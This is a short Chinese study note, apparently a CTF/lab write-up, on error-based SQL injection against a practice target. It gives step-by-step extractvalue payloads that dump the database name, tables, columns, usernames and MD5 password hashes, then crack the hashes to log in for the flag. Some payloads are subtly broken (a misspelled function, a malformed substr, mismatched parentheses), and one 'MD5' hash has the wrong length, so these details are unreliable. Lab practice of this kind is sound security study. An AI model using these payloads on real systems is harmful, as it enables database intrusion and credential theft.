刷题笔记:SQL注入漏洞测试(报错盲注)

 

只用and 1=2页面正常,没有报错,但在id=1后加’,会发现页面报错,说明‘与前面的’闭合了

可考虑用报错盲注

运用id=1' and extractvalue(1,concat(0x7e,database()))) --+语句来查询数据库名,即stormgroup

 

运用id=1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))来查询表名

得到第一个表名member,用同样的方法,得到另一个的表名为notice。

觉得第一个表更像我们要寻找的表,先查第一个表

运用id=1' and extranctvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='member' limit 0,1)))来查询列名

第一个列名为name,按同样的方法可得其他列名分别为password,status

 

利用id=1' and extractvalue(1,concat(0x7e,(select substr(concat(name),1,31) from member)))可查出具体数据name为mozhe

第二个name也为mozhe 

 

利用语句:id=1' and extractvalue(1,concat(0x7e,(select substr(concat(password) from member limit 0,1))))

可得第一个password:3114b433dece9180717f2b7de56b28a3

 

 同样的方法得第二个密码:239bb03ef584c605f7e8edf9a2b8fe882

用MD5进行解密,将得到的密码和用户名拿去登录,得flag

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值